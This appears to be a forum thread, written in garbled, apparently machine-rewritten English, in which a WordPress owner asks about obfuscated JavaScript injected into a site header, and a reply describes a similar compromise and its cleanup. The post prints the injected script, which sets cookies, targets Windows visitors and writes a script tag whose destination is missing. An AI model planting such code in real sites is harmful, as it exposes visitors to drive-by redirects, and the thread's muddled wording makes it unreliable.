I've got a WordPress installation that's been specific quite heavily with a phishing operation. I figured I'd the safety mostly covered except I discovered this within the header:

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<\/script>')};

That URL in the the finish is super suspicious. I researched but found no leads :-(

I've not yet found the origin from the code during my Wordpress installation. It isn't written in to the template files or database. Along the way of upgrading Wordpress install now.

Does anybody have understanding of the?

That appears strange in my experience. Maybe try re-installing wordpress and select very complex passwords so nobody unauthorized can access your website. You might like to take away the google statistics code in the page and find out in the event that is important. Complex passwords include amounts, uppercase and lowercase letters, slashes and other things you are able to think about. Make certain it's longer then 8 letters. If your internet site is infected, go lower on the internet NOW until your sure it isn't.

At random check a few of the wordpress install files. My ftp password was leaked. I personally use my female friends laptop once and saved the password. She should have downloaded some adware and spyware that taken the passwords. The end result was that javascript was injected into virtually any file having a standard web extension. Then any page you can browse to was trying to redirect the consumer with a russian site. Checking the website in chrome demonstrated a adware and spyware warning. The code I saw was more obfuscated than what you're seeing, however i would look at it. I wound up altering all passwords and managing a script to check on every file around the server for that footprint I had been seeing and take away it. That appears to possess exercised for me personally. If it's too complicated speak to your host and also have them see that account.